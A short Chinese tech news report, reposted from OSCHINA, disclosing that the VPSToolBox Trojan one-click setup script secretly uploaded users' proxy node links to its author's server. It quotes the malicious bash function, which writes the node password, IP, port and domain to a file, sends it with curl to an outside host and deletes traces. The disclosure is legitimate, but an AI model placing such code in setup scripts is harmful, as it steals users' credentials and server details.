来源:OSCHINA 时间:2023-03-30 18:17:58
(相关资料图)
V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码,会将用户自建的 Trojan 节点链接上传至远程服务器。
clean_env(){prasejsoncd /rootecho "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk "{print $2}" | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txtcurl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/nullrm ${myip}.txtcdrm -rf /root/*.shrm -rf /usr/share/nginx/*.shclear}恶意代码位置: https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494
据了解,该恶意代码已经存在超过一年时间。曾有用户提出 issue 指出该恶意代码,但被作者直接关闭了 issue。
该作者在2022年4月14日的一次更新中使用了上传 trojan 节点链接的代码,替换了原来加入 netdata 云监控的代码。通过查找其他用户克隆的仓库证实了这一说法。在被曝光后不久,作者删除了项目的 GitHub 仓库 (https://github.com/johnrosen1/vpstoolbox),该项目一共获得了 1.7k 个 star。
全平台数据 (数据库) 管理工具 DataCap 1.6.0 发布_全球速递
当前热点-首个接入 ChatGPT 的开源文档工具来了! 可用 AI 辅助生成文档!
Mybatis-Flex 1.0-beta2 发布,一个优雅的 Mybatis 增强框架
